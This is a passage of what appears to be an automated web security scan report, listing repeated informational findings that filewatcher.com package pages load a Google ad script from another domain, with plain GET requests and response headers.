http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32459.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "6nVkZzMSeqvCuf6hvnc4ew"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1038. http://www.filewatcher.com/p/aub-2.0.5.tgz.32461.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32461.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32461.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MJAVOHdF2gmbuFJIxXuO+Q"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1039. http://www.filewatcher.com/p/aub-2.0.5.tgz.32462.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32462.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32462.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ra3tgA1WladZrxiR6LTaLw"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1040. http://www.filewatcher.com/p/aub-2.0.5.tgz.32465.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32465.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32465.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GaxK/GhYXXYHWWP1HwLhKQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1041. http://www.filewatcher.com/p/aub-2.0.5.tgz.32466.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32466.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32466.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QxsPGnmz4YrG1OXd4ffiNQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 797
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1042. http://www.filewatcher.com/p/aub-2.0.5.tgz.32467.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32467.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32467.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l0aq4tZIH3WhupGp/A1IAQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1043. http://www.filewatcher.com/p/aub-2.0.5.tgz.32468.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32468.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32468.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2NGRp1yReNwfKEbNZNHubw"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1044. http://www.filewatcher.com/p/aub-2.0.5.tgz.32470.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32470.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32470.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0eoDk5dLiajv0dGeMmWITA"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1045. http://www.filewatcher.com/p/aub-2.0.5.tgz.32471.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32471.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32471.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CECO3T6sCRRd6uQZu7oSDg"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1046. http://www.filewatcher.com/p/aub-2.0.5.tgz.32472.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32472.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32472.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WMIC5TihThvVGA7UtH0Xdg"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 792
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1047. http://www.filewatcher.com/p/aub-2.0.5.tgz.32473.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32473.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32473.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fRKTB5IAN3H6kzBbiiQ98Q"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1048. http://www.filewatcher.com/p/aub-2.0.5.tgz.32474.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32474.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32474.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ba5+BfBeh8IySlAR4cKt0w"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1049. http://www.filewatcher.com/p/aub-2.0.5.tgz.32475.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32475.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32475.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XQHhaiGZ9CgvgEsKo0oLgA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1050. http://www.filewatcher.com/p/aub-2.0.5.tgz.32476.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32476.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32476.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "NSAnL/9OpC0bZK5Q+Vf0MQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1051. http://www.filewatcher.com/p/aub-2.0.5.tgz.32477.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32477.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32477.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hEQqu4Q723d6hCKkvWHeXA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1052. http://www.filewatcher.com/p/aub-2.0.5.tgz.32478.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32478.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32478.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3XmmYljQLE0koPlBzoJFmA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1053. http://www.filewatcher.com/p/aub-2.0.5.tgz.32479.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32479.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32479.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0NzweGpfmdwiyyA1L7eayA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1054. http://www.filewatcher.com/p/aub-2.0.5.tgz.32480.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32480.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32480.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jttPoVzJS+8lmYEN5/7qyA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1055. http://www.filewatcher.com/p/aub-2.0.5.tgz.32553.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/p/aub-2.0.5.tgz.32553.htm

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32553.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "OIRfuAWYWCMQPJ7k3QqlHQ"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
